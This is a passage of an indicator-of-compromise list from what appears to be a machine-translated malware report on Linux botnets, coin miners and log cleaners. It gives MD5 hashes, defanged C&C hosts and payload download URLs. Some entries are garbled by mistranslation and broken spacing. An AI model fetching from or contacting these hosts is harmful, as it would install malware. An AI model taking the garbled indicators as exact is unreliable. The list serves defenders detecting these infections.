– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Linux/Tsunami.Gen (2016.08.24.00)
– Shellbot/Perl.Generic.S1118 (2020.02.19.07)
– İndirici/Shell.Agent.SC189601 (2023.06.12.02)
– HackTool/Linux.LogWiper.22272 (2023.06.12.02)
– HackTool/Linux.LogWiper.28728 (2023.06.12.02)
– Trojan/Linux.Agent.8456 (2023.06.12.02)
– Trojan/Shell.Runner (2023.06.12.02) )
– CoinMiner/Text.Config (2023.06.12.02)
IOC
MD5
– 6187ec1eee4b0fb381dd27f30dd352c9 : İndirici Bash betiği (anahtar)
– 822b6f619e642cc76881ae90fb1f8e8e : Tsunami (a)
– c5142b41947f5d1853785020d9350de4 : ShellBot (bot) )
– 2cd8157ba0171ca5d8b50499f4440d96 : ShellBot (logo) – 32eb33cdfa763b012cd8bcad97d560f0
: MIG Logcleaner v2.0 (cls) –
98b8cd5ccd6f7177007976aeb675ec38 : 0x3 33shadow Günlük Temizleyici ( temiz)
– e2f08f163d81f79c1f94bd34b22d3191 : Ayrıcalık Arttırma Kötü Amaçlı Yazılımı (ping6)
– 725ac5754b123923490c79191fdf4f76 : Bash başlatıcısı (git)
– ad04aab3e732ce5220db0b0fc9bc8a19 : Bas h başlatıcı (televizör)
– 421ffee8a223210b2c8f2384ee6a88b4 : Bash başlatıcı (telecomanda)
– 0014403121eeaebaeede796e4b6e5dbe : XMRig CoinMiner (cnrig)
– 125951260a0cb473ce9b7acc406e83e1 : XMRig yapılandırma dosyası (config.json)
C&C
– ircx.us[.]to:20 : ShellBot
– ircx.us[.]to:53 : Tsunami
– ircx.us[.]to:6667 : ShellBot
– ircxx.us[.]to:53 : Tsunami
다운로드 주소
– ddoser[.]org/key: İndirici Bash betiği
– ddoser[.]org/a : Tsunami
– ddoser[.]org/logo : ShellBot
– ddoser[.]o]rg/siwen/bot / ShellBot DDoS Bot
– ddoser[.]org/top : Sıkıştırılmış XMRig CoinMiner dosyası
– ddoser[.]org/siwen/cls : MIG Logcleaner v2.0
– ddoser[.]org/siwen/clean : 0x333shadow Günlük Temizleyici
– ddoser[.]org/ siwen/ping6 : Ayrıcalık yükseltme kötü amaçlı yazılımı